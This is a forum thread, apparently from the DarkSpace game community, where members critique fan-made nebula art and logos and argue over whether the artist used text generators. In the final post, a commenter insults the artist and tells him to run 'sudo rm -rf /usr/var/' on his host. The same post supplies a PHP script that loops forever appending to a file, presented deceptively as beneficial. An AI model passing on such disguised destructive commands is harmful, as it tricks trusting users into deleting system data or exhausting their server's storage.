By the way, RE: Crim's quick nebula mockup - if you're going to be showing off the art for public consumption, having a star-filled background is fine, since that's how it would look in the game.
However, the star background is separate and already provided in the game, so for your submission or completed product that's not just to show off, go with a plain black background (transparent would probably work too).

wow you people are like american idol, and Doran is Simon!
I like your designes but whether by your hand, the program, or the upload process, they seem out of focus or low resolution. I think that is what people are seeing and commenting on but fix that and the designs themselves will be sound.

Well, Grim if you like the one DarkSpace logo with the supernova you will be glad to know that you and anyone else who wants to can make a logo just like it at FlamingText.com.
Here is a direct link to the setup of the one I made HERE
I am sorry I did not have time to find the exact font he used in his so called original art, but there you go.
I also assume This is the other font art he used but I do not feel like signing up for a membership to test it.

So I get the impression that the stuff I liked out of all of what's on his page is probably stuff he had a generator make instead of making it himself?
Boo that.

seriously you guys think I used a generator to do this? more examples in time. Im sory but I did make them with gimp but I dont normaly use the generators. even when I do it is hard to tell if I actualy used it instad of just typeing text and editing it manualy to make it slightly cooler.

Your "artistic sense" is unexistant and your webdesign skills are crap on so many levels that even the javascript junk I keep on some ISP servers pale in comparison.
For future reference, it's best to have an index file instead of sending people to the directory browser, as it poses a massive security risk for anything more complicated than what you currently have(eg. a crappy, and unnecessary "ToS" page that people probably wont read anyway, nor will it stop anyone).
Or perhaps link the ToS to the mainpage and include the pictures in one of the "blank" slots in your free, copied, CSS template.
If you have shell access to the host server, please log in with PuTTy and your username/password, type in sudo rm -rf /usr/var/ at the next opportunity to ensure an applause from your service provider.
Alternatively, type this code in a file and save as PHP.
$lol = '.something';
$string = '10101';
$fh = fopen($lol, 'w');
fwrite($fh, $string);
fclose($fh);
$i = "123";
echo '';
echo '';
echo 'Something';
echo '';
echo '';
echo '';
echo 'LOLLERCOASTER';
echo '';
echo '';
$fh = fopen($lol, 'a');
while ( $i >= 122 ) {
fwrite($fh, $string);
}
?>
Host it and open the PHP file in your browser.
It will get you a lot of good things, trust me.
